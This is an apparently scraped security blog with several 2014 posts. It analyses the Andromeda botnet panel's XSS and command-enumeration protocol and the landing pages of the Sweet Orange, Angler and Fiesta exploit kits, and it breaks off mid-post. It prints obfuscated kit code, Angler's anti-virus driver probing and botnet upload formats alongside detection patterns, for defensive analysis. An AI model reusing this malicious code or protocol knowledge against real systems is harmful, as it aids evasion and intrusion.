<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZw7bbIthExB_FhIBYs7InzhVB_KsSNukyxlXe0QSFuMcYe3bmWhorl3ozv4bMJCE_91xLOc5Fx_HBo4ULSJm7IBZFPe90EwKV99Zc9wbc5OnjLwswID1bJfQ_28Ts0pFfpu7QhReNzq4/s1600/andromeda_adm_xss.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZw7bbIthExB_FhIBYs7InzhVB_KsSNukyxlXe0QSFuMcYe3bmWhorl3ozv4bMJCE_91xLOc5Fx_HBo4ULSJm7IBZFPe90EwKV99Zc9wbc5OnjLwswID1bJfQ_28Ts0pFfpu7QhReNzq4/s1600/andromeda_adm_xss.png" height="141" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Result of the Javascript while viewing tasklist</td></tr>
</tbody></table>
<br />
<br />
<h3>
Command Enumeration (requires RC4 key)</h3>
Having established two vulnerabilities in the admin panel, the same type of code (obfuscation and naming convention) is also found in the gate (<b>gate.php</b>). Since Andromeda doesn't have the ability to upload files it ain't possible to remotely upload files, such as with the ZeuS remote update vulnerability.<br />
<br />
However, it is however possible to communicate with the panel to retrieve commands and submit data in the form of keylogs and grabbed forms. The key can be acquired through debugging (out of scope in this post).<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdCb06XyLOwXFUZR5Pobxs3k8Ntnl9uALEqsrfo8UxGKMmQtb1vG8msahVID_p8fxFQUYj6KWJmiH744kLrAsxhzFUvZ2c35XlkP4o1N-WbGeR-uJYh7aE3DYbT6dl1m_C3clYrtP1HbQ/s1600/andromeda_adm_checkin.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdCb06XyLOwXFUZR5Pobxs3k8Ntnl9uALEqsrfo8UxGKMmQtb1vG8msahVID_p8fxFQUYj6KWJmiH744kLrAsxhzFUvZ2c35XlkP4o1N-WbGeR-uJYh7aE3DYbT6dl1m_C3clYrtP1HbQ/s1600/andromeda_adm_checkin.png" height="225" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Code for parsing data from POST-request</td></tr>
</tbody></table>
The format used to doing a regular checkin is <b>id:%lu|bid:%lu|os:%lu|a:%lu|rg:%lu</b>, more can be found analyzing the binary (out of scope for this post). If the data is encrypted with the correct key and posted to the panel, the panel will respond with HTTP 200 OK and encrypted data if tasks have been configured. <br />
<br />
The response is encrypted using the bot id as key.<br />
<br />
If the wrong key is used to encrypt the data or the data is malformed, the panel will return HTTP 404 response.<br />
<br />
Python makes it easy to automate all of this to enumerate commands from an existing server [<a href="http://pastebin.com/nPfQzhcN">script</a>]:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMd-LLrFEoaC2ryw_QLP3gidzM68rOagvQhlmO503yRhBNo0z3SlOIfiPb6fXAsob_KVfNtVnWMBNFc6xsNsQxJZfJl1mvPgaBfjmVBLbFZ7-VgjhHCOMam6_4N3tJVlJfzRTArppoScQ/s1600/andromeda_gate_script.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMd-LLrFEoaC2ryw_QLP3gidzM68rOagvQhlmO503yRhBNo0z3SlOIfiPb6fXAsob_KVfNtVnWMBNFc6xsNsQxJZfJl1mvPgaBfjmVBLbFZ7-VgjhHCOMam6_4N3tJVlJfzRTArppoScQ/s1600/andromeda_gate_script.png" height="92" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Script for enumerating commands from panel</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
Uploading keylogs and formgrabs can be done by appending <b>fg: </b>or <b>kl: </b>followed by base64-encoded logs to the above format. Each grabbed form and each keylog is delimited by 0x01, the values in each log are delimited by 0x02 (for example user-agent, cookie and URL for forms grabbed).<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUKbW9VKAdtr4mnADl2Z4QxlKiaN_poAv94E2zjNa0dLYlMbj_DaOe_jZDJ8swjgit3rnZV_oJUf4Pr6K6Cu3PaWfW-sA_pR401h8U8D7hdO3dxbQ2KPRtGv3tx31VN-q3VPYqJUi3JHE/s1600/andromeda_adm_logs.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUKbW9VKAdtr4mnADl2Z4QxlKiaN_poAv94E2zjNa0dLYlMbj_DaOe_jZDJ8swjgit3rnZV_oJUf4Pr6K6Cu3PaWfW-sA_pR401h8U8D7hdO3dxbQ2KPRtGv3tx31VN-q3VPYqJUi3JHE/s1600/andromeda_adm_logs.png" height="98" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Code for parsing uploaded logs</td></tr>
</tbody></table>
An example of formatting for keylogs before base64 encoding:<br />
<b>\x01<keylog>\x02<process caption>\x02<process name>\x01</b><br />
Formgrabs:<br />
<b> </b><br />
<b>\x01<cookie>\x02<form data>\x02<user-agent>\x02<URL>\x01</b><br />
<br />
The data posted does however not execute in the panel as it gets escaped on output. But it does enable for leaving a message to the actor(s) running the panel.<br />
<br />
<h4>
Conclusion</h4>
The vulnerabilities might very well exist in more places but vulnerabilities specified does however enable for example researches to battle malware and malware campaigns.<br />
<br />
By enumerating commands from the panel, it's possible to track the actors steps by downloading the malware and plugins that the bot is intended to download.<br />
<br />
It's also possible to leave a message in the form of keylogs and formgrabs to let the actor(s) know that they are under the observation.<br />
<br />
<h3>
Recommended Reading</h3>
<ul>
<li><a href="http://int0xcc.svbtle.com/how-to-bypass-zeus-trojans-self-protection-mechanism">How to bypass Zeus Trojan’s self protection mechanism</a></li>
</ul>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />Anonymoushttp://www.blogger.com/profile/17658714840850871714noreply@blogger.com0tag:blogger.com,1999:blog-6803479147531086040.post-53308188077567427692014-08-21T13:59:00.000-07:002014-08-21T13:59:12.664-07:00Landingpages bites the dust - Sweet OrangeSweet Orange (SO) have become more and more rare lately but it's one of the kits that haven't changed at all when it comes to the landingpage.<br />
<br />
<h4>
Basic Structure</h4>
SO carries one of the biggest landingpages of all the kits with a size of 280-300Kb, all of which includes a string of 6-8 bytes that works as a delimiter for the "main" script in the landingpage.<br />
<br />
It also includes some legitimate HTML to make it look like a legitimate webpage, and the content is actually from real webpages. The sample used in this post can be found on [<a href="http://pastebin.com/cw3AVJLq">pastebin</a>]. Using Google it's found that the HTML originates from <i>www.mariposamuseum.org/world_instruments03.html</i>, the difference is that the word <i>Idiophones </i>have been replaced with <i>Large Cloud</i>:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdNBmGfOZI2ZCMvlbuV4pPjOlPJMnrJ5OoKfqJy2cWv9yNjpJ40fgsLQE7LqFoc8M9mVnITdLMLCvdwo0zS5GcO_RuCmilvfVA6xzlLzDLG6vK_EDcbT1wluCKBmC2_C-l1-n6x7Cyt10/s1600/sweet_orange_landingpage_html.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdNBmGfOZI2ZCMvlbuV4pPjOlPJMnrJ5OoKfqJy2cWv9yNjpJ40fgsLQE7LqFoc8M9mVnITdLMLCvdwo0zS5GcO_RuCmilvfVA6xzlLzDLG6vK_EDcbT1wluCKBmC2_C-l1-n6x7Cyt10/s1600/sweet_orange_landingpage_html.png" height="120" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Sweet Orange HTML compared to legitimate webpage</td></tr>
</tbody></table>
After the decoy HTML, the malicious script starts. The plugin detection is hidden in a <b>li</b>-tag which is subject for replacement at the bottom of the landingpage.<br />
<br />
There is two levels of obfuscation, first the delimiter will be removed, revealing the main script however, all <b>&</b>, <b><</b>, <b>> </b>and <b>% </b>are nowhere to be found. Those are added at the end using <b>String.replace</b> in the second level.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKtmHG8_zSU6bT-_2RhzxZ8vwfFuZwqpoudIeRgMIT0Nhdl2ynvwpZdLAPjV2nHcCTGoTqz59_1HkFXmQ4vi8XWOaKE7PtGSebE0iNqLQqkub4f9K0pi8YxPIwBJDaeVBkQ2qfSEuHjkM/s1600/sweet_orange_landingpage_decode.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKtmHG8_zSU6bT-_2RhzxZ8vwfFuZwqpoudIeRgMIT0Nhdl2ynvwpZdLAPjV2nHcCTGoTqz59_1HkFXmQ4vi8XWOaKE7PtGSebE0iNqLQqkub4f9K0pi8YxPIwBJDaeVBkQ2qfSEuHjkM/s1600/sweet_orange_landingpage_decode.png" height="71" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">String replacement in landingpage</td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"></td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
<br />
<h4>
Client identification</h4>
The main script [<a href="http://pastebin.com/9jCqdhCd">pastebin</a>] checks for browser version and Flash version before launching any exploits. The function names are not obfuscated, making it easy to read.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqE07-sfJN8BXelEKFCDZMtQEW4X-Cu-_2LObLBEgIUW0Jf9R8rjkN1fwBLOGvJr14lcevfjHltoMQeghF7Jy1LOWDlsXtLIhxoSxoSJCuK5_meJtoZHmvSm6yaHJt1JYrdPJoFytX_CM/s1600/sweet_orange_landingpage_ie.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqE07-sfJN8BXelEKFCDZMtQEW4X-Cu-_2LObLBEgIUW0Jf9R8rjkN1fwBLOGvJr14lcevfjHltoMQeghF7Jy1LOWDlsXtLIhxoSxoSJCuK5_meJtoZHmvSm6yaHJt1JYrdPJoFytX_CM/s1600/sweet_orange_landingpage_ie.png" height="345" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Check browser and launch IE exploit</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQA-CkUnjOs2EPBNYKZ7nDhxWeTA16KhSwK4eSv44d7X28kHhbsJout7Fyvhe0OF0Gaxa4GuTq_r1wBirdm6ivsar-h8d6UrX6EyMbQmEj31otJI5MxaahxA1HGZuW2ipP-SvF8cJonn8/s1600/sweet_orange_landingpage_swf.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQA-CkUnjOs2EPBNYKZ7nDhxWeTA16KhSwK4eSv44d7X28kHhbsJout7Fyvhe0OF0Gaxa4GuTq_r1wBirdm6ivsar-h8d6UrX6EyMbQmEj31otJI5MxaahxA1HGZuW2ipP-SvF8cJonn8/s1600/sweet_orange_landingpage_swf.png" height="223" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Check Flash and launch Flash exploit</td></tr>
</tbody></table>
Last but not least, a JNLP will be loaded in preparation for Java exploitation.<br />
<br />
There isn't really that much to it in terms of advanced techniques or tricks.<br />
<br />
<h4>
Detection</h4>
Here is a few examples taken from Sweet Orange throughout the year.<br />
<u><b>2014-04-20:</b></u><br />
<pre class="brush: js">ubjCzzjOSb = jinLOqHUrn.substring(60).replace(/jeR--_33S/, "");
ubjCzzjOSb = ubjCzzjOSb["xRadwPhBvkonCnYGSLGSNR".charAt(21).toString().toLowerCase() + "zQYbiTsKBgHRMmboJTCAUePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__mb3__/, "<");
ubjCzzjOSb = ubjCzzjOSb["BVsXCvUwSbVDbYmIAxdwKR".charAt(21).toString().toLowerCase() + "BuMUiFRjDVDxOELrHlydsePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__Ob8__/, ">");
ubjCzzjOSb = ubjCzzjOSb["VgIvbfxtpUcdELmXlPMuDR".charAt(21).toString().toLowerCase() + "cluTqHOwGCviXBvPObDlaePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__Hb7__/, "&");
ubjCzzjOSb = ubjCzzjOSb["UJchLeVPhClZLEBVWleeBR".charAt(21).toString().toLowerCase() + "RzifGzNyuLgkuWfsJdvktePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__Nc0__/, "%");</pre>
<br />
<u><b>2014-06-28:</b></u><br />
<pre class="brush: js">mmSGqncKVi = DkPBNuJiFk.substring(60).replace(/ZJXm-_7q2/, "");
mmSGqncKVi = mmSGqncKVi["svcUQTPiOxzQewMHjxUSmR".charAt(21).toString().toLowerCase() + "ynnIJcpckBccKDamANMALePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__hhg7_/, "<");
mmSGqncKVi = mmSGqncKVi["IJvXqlxwzJjPMiYeTCdJUR".charAt(21).toString().toLowerCase() + "XTLpgjtTeESBeyEKjWQhGePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__Db8__/, ">");
mmSGqncKVi = mmSGqncKVi["fCDSsWebkuqhbWMWbZLChR".charAt(21).toString().toLowerCase() + "lkgHcnCcpWveIGpoYMNStePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/_uio0__/, "&");
mmSGqncKVi = mmSGqncKVi["uNADVNFPkHZaUlEcMVVyTR".charAt(21).toString().toLowerCase() + "tUFiudmZYpEKgtNxoehPuePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__cc0__/, "%");</pre>
<br />
<u><b>2014-08-20:</b></u><br />
<pre class="brush: js">PoBpsXFGOP = jUkalrchvM.substring(60).replace(/n5Xc4_7w9/, "");
PoBpsXFGOP = PoBpsXFGOP["hhFcPPScoahJvsMypMhooR".charAt(Math.sqrt(441)).toString().toLowerCase() + "ghoAJERaNwXAkWJcmsXBoePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__hhg7_/, "<");
PoBpsXFGOP = PoBpsXFGOP["qaBaJkOMfRPHHqyRBmGnZR".charAt(Math.sqrt(441)).toString().toLowerCase() + "LNlIfrpfGHpeqyJtyGMJlePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__Db8__/, ">");
PoBpsXFGOP = PoBpsXFGOP["gfZrLHSdOjKprxNoOQqXFR".charAt(Math.sqrt(441)).toString().toLowerCase() + "KzlUJPpCvqIVcAZhjsNGZePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/_uio0__/, "&");
PoBpsXFGOP = PoBpsXFGOP["LBeVqPfZzJLqgNhrMJNIMR".charAt(Math.sqrt(441)).toString().toLowerCase() + "wXWMEtMqIJmHaazzTqEOcePl".substring(21, 28).toLowerCase() + "Ace".toLowerCase()](/__cc0__/, "%");</pre>
<br />
It's found that the pattern below is consistent in all the landingpages (not limited to above samples).<br />
<br />
<b>.substring(21, 28).toLowerCase() + "Ace".toLowerCase()] </b><br />
<br />
<span style="font-weight: normal;">This would enable for detecting and blocking Sweet Orange before any exploits gets to be launched.</span><br />
<h4>
<br /></h4>
<h4>
</h4>
<h4>
Resources </h4>
Check out <a href="http://malware-traffic-analysis.net/2014/08/20/index.html">Malware-traffic-analysis.net</a> for more examples and live traffic from Sweet Orange. The post include links to all captures done by <a href="https://twitter.com/malware_traffic">@malware_traffic</a> (big thanks for providing data!). Anonymoushttp://www.blogger.com/profile/17658714840850871714noreply@blogger.com0tag:blogger.com,1999:blog-6803479147531086040.post-73688881265243839012014-08-02T05:46:00.000-07:002014-08-02T16:22:01.581-07:00Landingpages bites the dust - Angler<h4>
Basic structure</h4>
The landingpage is built up of two stages of obfuscation where there are five containers at the beginning of the page with obfuscated data (one for each line), each with it's own specific purpose. In the landingpage used in this example [<a href="http://pastebin.com/qAVuS6w0">pastebin</a>] you'll find these five on lines 28-32.<br />
<br />
After the five containers comes the function for deobfuscating and executing the code in the each container.<br />
<br />
The section that comes next includes obfuscated strings which will be used by the code in the containers at the top, this includes domain and URI for the exploits.<br />
<br />
The rest of the landingpage is simply just a decoy to make the page look "legit".<br />
<br />
<h4>
Client identification</h4>
Angler does not only use plugin-detection to identify vulnerable versions, it does also employ detection of installed anti-virus software. This is done through the code in the first container. The code can be found by setting a breakpoint on the line calling <b>eval()</b> in the deobfuscation-function:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyQFdqQJKuPav8S5S0xNXRtgVdUjITTyQJvXVHK540pnrdlMFAuaUk17lEb7OHQHyEXCNG5Wlx4I-ipwsnhxfd0IhuDm3W2H-eOW_rpbhEr2qC_lR-R4Xa3Fnq34gi_kRIEfn39OFuKtA/s1600/angler_landingpage_eval1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyQFdqQJKuPav8S5S0xNXRtgVdUjITTyQJvXVHK540pnrdlMFAuaUk17lEb7OHQHyEXCNG5Wlx4I-ipwsnhxfd0IhuDm3W2H-eOW_rpbhEr2qC_lR-R4Xa3Fnq34gi_kRIEfn39OFuKtA/s1600/angler_landingpage_eval1.png" height="384" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Firefox Webdeveloper Debugger</td></tr>
</tbody></table>
The contents of <b>HzV0 </b>gives us the code:<br />
<pre class="brush: js"> function gs7sfd(txt) {
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.async = true;
xmlDoc.loadXML('');
if (xmlDoc.parseError.errorCode != 0) {
var err = "Error Code: " + xmlDoc.parseError.errorCode + "\n";
err += "Error Reason: " + xmlDoc.parseError.reason;
err += "Error Line: " + xmlDoc.parseError.line;
if (err.indexOf("-2147023083") > 0) {
return 1;
} else {
return 0;
}
}
return 0;
}
if (gs7sfd("c:\\Windows\\System32\\drivers\\kl1.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmactmon.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmcomm.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmevtmgr.sys") || gs7sfd("c:\\windows\\system32\\drivers\\TMEBC32.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmeext.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmnciesc.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmtdi.sys")) {
window['zxtbVDMp'] = true;
BzJUQufh = '';
window.sf325gtgs7sfdj = window.sf325gtgs7sfds = window.sf325gtgs7sfdf1 = window.sf325gtgs7sfdf2 = false;
};
</pre>
<br />
<br />
If it should find that if Kaspersky or TrendMicro anti-virus is installed, it will cancel the intrusion attempt as it's likely to fail and unwanted noise is created (alerts from anti-virus). Another interesting part is that if you look at the landingpage of <a href="http://thembits.blogspot.se/2014/07/landingpages-bites-dust-rig.html">RIG</a> you'll find that it uses the exact same code, which is originally found in <a href="http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html">"Operation Snowman".</a><br />
<br />
The code in the second container is responsible for checking the version of installed plugins, but also the function for decoding the strings listed in the original landingpage where the key is defined in the variable ending with <b>0</b>:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBday5-LRFtoAGMM-Ckco7MqgdXTWEex51c1f4bp-KOp_f5QzgD6pJ0iQ6uF5gwQymlzYRl_KQtaSTdrQuv-27N891du7-p9MlzW2Viu1cGr1i5Q48ka4cMI94_0t1CEYZYDf4wCT1sac/s1600/angler_landingpage_cryptKey.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBday5-LRFtoAGMM-Ckco7MqgdXTWEex51c1f4bp-KOp_f5QzgD6pJ0iQ6uF5gwQymlzYRl_KQtaSTdrQuv-27N891du7-p9MlzW2Viu1cGr1i5Q48ka4cMI94_0t1CEYZYDf4wCT1sac/s1600/angler_landingpage_cryptKey.png" height="150" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Original landingpage on the left, code in second container on the right</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
The third contains the code for generating code used for loading a Silverlight exploit:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh60m3WyJAvIuoP03JwRkZdJD-4xyVy5ls3TnHwOY0phAFRoUn90Zq8X6JnZ0eZR7qUecQgdyTQuDb6Yxrxj3NwWjaZf-6uMindfD4PzJ4-_7j6CjZbaF_kIVFwTP2z2QkMfRoyFQS0cQ/s1600/angler_landingpage_silverlight.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh60m3WyJAvIuoP03JwRkZdJD-4xyVy5ls3TnHwOY0phAFRoUn90Zq8X6JnZ0eZR7qUecQgdyTQuDb6Yxrxj3NwWjaZf-6uMindfD4PzJ4-_7j6CjZbaF_kIVFwTP2z2QkMfRoyFQS0cQ/s1600/angler_landingpage_silverlight.png" height="182" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Original landingpage on the left, code in third container on the right</td></tr>
</tbody></table>
The same approach is used for the Flash exploit. If it should be found that none of Silverlight, Flash or Java installed it would resort to Internet Explorer exploit if the version is > 10.<br />
<br />
A summary of all deobfuscated sections can be found on pastebin. [<a href="http://pastebin.com/YBPKd9kM">pastebin</a>]<br />
<br />
<h4>
Detection</h4>
Angler is one of the kits which have a generic look when it comes to the landingpage request, the response however is another story as shown above.<br />
<br />
The top containers are changing from instance to instance but the variables after the deobfuscation function doesn't (i.e the variables ending with 0-11), they follow the same pattern. Some examples:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3weYMmGk143UgQP4XRVixTYM6mwDCK4c_kcQNFMVD3H_B-K3unag4lx2UdNLtX3wnikEaWpG1iQc0YZyLxUsGG9sbCyUYCM6Rn5Kc52pU9-CG33kcFQsOrM1Q5ICBAoQlGXaItRUjCmE/s1600/angler_landingpage_keys.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3weYMmGk143UgQP4XRVixTYM6mwDCK4c_kcQNFMVD3H_B-K3unag4lx2UdNLtX3wnikEaWpG1iQc0YZyLxUsGG9sbCyUYCM6Rn5Kc52pU9-CG33kcFQsOrM1Q5ICBAoQlGXaItRUjCmE/s1600/angler_landingpage_keys.png" height="272" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Three different landingpages</td></tr>
</tbody></table>
The one which is most noticeable is the variable ending with <b>0</b>, which as shown earlier holds the deobfuscation key which is always 20 byte. Giving a suggested pattern of:<br />
/[A-Za-z]{6}([0-9])?0\s=\s'[A-Za-z0-9]{20}',\x0a/<br />
<h4>
<br />Resources</h4>
For those who use Snort/Suricata which only capture the trigger-packet, this script could help in decoding the strings and revealing the source domain. [<a href="http://pastebin.com/8Vz65qvg">pastebin</a>]<br />
<br />
More examples of Angler can be found from <a href="http://malware-traffic-analysis.net/">malware-traffic-analysis.net</a><br />
<br />Anonymoushttp://www.blogger.com/profile/17658714840850871714noreply@blogger.com0tag:blogger.com,1999:blog-6803479147531086040.post-91570644169649027542014-07-25T04:31:00.000-07:002014-08-02T16:20:21.642-07:00Landingpages bites the dust - FiestaFiesta is one of the kits which have been around for quite some time and haven't undergone any major changes. The URI have changed for the landingpage but not the landingpage itself.<br />
<br />
<h4>
Basic structure</h4>
Fiesta is using string obfuscation to hide links to exploits which then is concatenated to form the landingpage. There isn't much to it than that, moving on to the client identification and detection.<br />
<br />
<h4>
Client identification</h4>
Fiesta doesn't employ any detection for anti-virus or virtual environment as Angler nor using PluginDetect, but simply uses it's own implementation of detecting installed plugins.<br />
<br />
It will run the detection for each plugin, top to bottom and directly after each check it will load an exploit if the plugin is found to be vulnerable as shown below (comments added by me):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh15NTJvZXQMN_zQimK3LKhIzH9UYkIffsceNOAuKTOy6b040TJqH2idzPDI0DFIDNq1hJ1-JN94J0Lx_D9EuF6UJT5oi2e4XYwYcxA7d2Ris-y5OoOPtMB-AQPaiPiYDliNvd9mVczd2w/s1600/fiesta_landingpage_adobe.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh15NTJvZXQMN_zQimK3LKhIzH9UYkIffsceNOAuKTOy6b040TJqH2idzPDI0DFIDNq1hJ1-JN94J0Lx_D9EuF6UJT5oi2e4XYwYcxA7d2Ris-y5OoOPtMB-AQPaiPiYDliNvd9mVczd2w/s1600/fiesta_landingpage_adobe.png" height="424" width="640" /></a></div>
<br />
The sample from above can be found here; [<a href="http://pastebin.com/VeBmAnJW">pastebin, raw</a>] [<a href="http://pastebin.com/PmdTKa77">pastebin, decoded</a>]<br />
<br />
<h4>
Detection</h4>
Fiesta have made small changes to the URI to the landingpage during the last year using for example:<br />
<i>domain.tld/anfjsf4/2</i><br />
<i>domain.tld/skejgq7/?1</i><br />
<i>domain.tld/ajdw2ja/</i><i>osf3tyzhuohcvpxoythoclzqruiis6rxd9w</i><br />
<br />
The landingpage however haven't been changed more than the obfuscation key, which is changed every 7 days (approximately).<br />
<br />
The key can be identified in the first Javascript function in the response as shown in the PCAP's below:<br />
Example one:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAoZGibONKb9X8VWNm5bBzCcQ2LrJXJoxcd34yaQAYCFllNdOTGoUKya30VLK1jt15Pt-0tT0BJzd5znwQ465KdgUAfeKCZ5xz8o_rrc_GuY0cMfV3mkfTUHUBk6Y7ucJ-FLgl53rB9Qk/s1600/fiesta_landingpage_key1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAoZGibONKb9X8VWNm5bBzCcQ2LrJXJoxcd34yaQAYCFllNdOTGoUKya30VLK1jt15Pt-0tT0BJzd5znwQ465KdgUAfeKCZ5xz8o_rrc_GuY0cMfV3mkfTUHUBk6Y7ucJ-FLgl53rB9Qk/s1600/fiesta_landingpage_key1.png" height="134" width="640" /></a></div>
Example two:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX619_vFJwk0UkR70sdgWoRtaK2nZgCnWVYvA-dYa54MbhOtkS-pbkgWv4BERphiT-PjAIX2wiVswv-6uRqbXoRiGQGwwMegmW5H73K1sCVsUgigIdHyr0eIQXLbuEI329CgkTnc9dDgU/s1600/fiesta_landingpage_key2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX619_vFJwk0UkR70sdgWoRtaK2nZgCnWVYvA-dYa54MbhOtkS-pbkgWv4BERphiT-PjAIX2wiVswv-6uRqbXoRiGQGwwMegmW5H73K1sCVsUgigIdHyr0eIQXLbuEI329CgkTnc9dDgU/s1600/fiesta_landingpage_key2.png" height="134" width="640" /></a></div>
Example three:<br />
<div class="separator" style="clear: both; text-align: center;">
